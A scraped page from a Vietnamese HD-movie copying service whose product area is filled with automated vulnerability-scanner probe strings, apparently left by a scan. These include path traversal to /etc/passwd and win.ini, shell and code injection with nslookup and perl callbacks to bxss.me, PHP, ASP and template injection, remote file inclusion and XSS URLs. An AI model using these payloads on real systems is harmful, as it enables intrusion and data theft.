TRANG CHỦ HƯỚNG DẪN SỬ DỤNG DOWNLOAD DỊCH VỤ CHÉP PHIM HD DỊCH VỤ HỖ TRỢ CHUYỄN SANG PHIÊN BẢN WEBSITE MỚI
English
 
DỊCH VỤ CHÉP PHIM HD
DANH MỤC SẢN PHẨM
 
TÌM KIẾM NÂNG CAO
 
 
 
 
HỖ TRỢ TRỰC TUYẾN
 
Hỗ Trợ Mua Hàng
 
 
Hỗ Trợ Website
 
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
 
 
1
 
 
1
 
 
1DptY634FxO
 
 
1
 
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
response.write(9904615*9005641)
 
 
'+response.write(9904615*9005641)+'
 
 
"+response.write(9904615*9005641)+"
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
KNBmoY9f
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
  ">&m=g&t=1" border="0" />
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
 
 
1
 
 
12345'"\'\");|]*{ <>
 
 
1
 
 
1
 
 
 
 
1
 
 
1
 
 
1
 
 
../../../../../../../../../../etc/passwd
 
 
1
 
 
1
  ">&m=g&t=1" border="0" />
 
1
 
 
1
 
 
../../../../../../../../../../windows/win.ini
 
 
1
 
 
1
 
 
1
 
 
../1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
${9999687+9999080}
 
 
1
 
 
1
 
 
echo bksuex$()\ xetnfk\nz^xyu||a #' &echo bksuex$()\ xetnfk\nz^xyu||a #|" &echo bksuex$()\ xetnfk\nz^xyu||a #
 
 
&echo fjfexx$()\ fdshlk\nz^xyu||a #' &echo fjfexx$()\ fdshlk\nz^xyu||a #|" &echo fjfexx$()\ fdshlk\nz^xyu||a #
 
 
|echo qwmsqe$()\ yytqmm\nz^xyu||a #' |echo qwmsqe$()\ yytqmm\nz^xyu||a #|" |echo qwmsqe$()\ yytqmm\nz^xyu||a #
 
 
(nslookup hitgttodzoamee115a.bxss.me||perl -e "gethostbyname('hitgttodzoamee115a.bxss.me')")
 
 
$(nslookup hiteznwjzepwf0b9a7.bxss.me||perl -e "gethostbyname('hiteznwjzepwf0b9a7.bxss.me')")
 
 
1
 
 
&(nslookup hitaqxqlssmoz7a4b7.bxss.me||perl -e "gethostbyname('hitaqxqlssmoz7a4b7.bxss.me')")&'\"`0&(nslookup hitaqxqlssmoz7a4b7.bxss.me||perl -e "gethostbyname('hitaqxqlssmoz7a4b7.bxss.me')")&`'
 
 
1
 
 
|(nslookup hitazafboadgb7dd3e.bxss.me||perl -e "gethostbyname('hitazafboadgb7dd3e.bxss.me')")
 
 
1
 
 
1
 
 
1
 
 
`(nslookup hitjfoxzeztql2a720.bxss.me||perl -e "gethostbyname('hitjfoxzeztql2a720.bxss.me')")`
 
 
1
 
 
1
 
 
;(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('hitzjzkpbkzvo252a3.bxss.me')")|(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('hitzjzkpbkzvo252a3.bxss.me')")&(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('h
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1&n998222=v905128
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
)
 
 
1
 
 
!(()&&!|*|*|
 
 
1
 
 
1
 
 
^(#$!@#$)(()))******
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
 
 
1
 
 
'"()
 
 
1
 
 
1
 
 
1
 
 
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
 
 
1
 
 
1some_inexistent_file_with_long_name.jpg
 
 
Http://bxss.me/t/fit.txt
 
 
'.gethostbyname(lc('hitkf'.'czzoajwi46e18.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(76).chr(122).chr(90).'
 
 
http://bxss.me/t/fit.txt?.jpg
 
 
".gethostbyname(lc("hital"."ewjtajyu73af1.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(66).chr(97).chr(79)."
 
 
bxss.me
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
HttP://bxss.me/t/xss.html?%00
 
 
1
 
 
1
 
 
bxss.me/t/xss.html?%00
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
"+"A".concat(70-3).concat(22*4).concat(120).concat(90).concat(116).concat(75)+(require"socket" Socket.gethostbyname("hithr"+"agxdstgf7f8ff.bxss.me.")[3].to_s)+"
 
 
1
 
 
1
 
 
1
 
 
'+'A'.concat(70-3).concat(22*4).concat(100).concat(76).concat(114).concat(68)+(require'socket' Socket.gethostbyname('hitil'+'xffowyyef7d62.bxss.me.')[3].to_s)+'
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
index.php
 
 
/xfs.bxss.me
 
 
1
 
 
1
 
 
index.php
 
 
1
 
 
index.php/.
 
 
1
 
 
1
 
 
1
 
 
;print(md5(31337));
 
 
1
 
 
1
 
 
';print(md5(31337));$a='
 
 
1
 
 
";print(md5(31337));$a="
 
 
${@print(md5(31337))}
 
 
'"
 
 
${@print(md5(31337))}\
 
 
 

 
   HƯỚNG DẪN SỬ DỤNG   |   DOWNLOAD   |   DỊCH VỤ CHÉP PHIM HD   |   DỊCH VỤ HỖ TRỢ   
 
Lượt truy cập 783414  
Số người online 13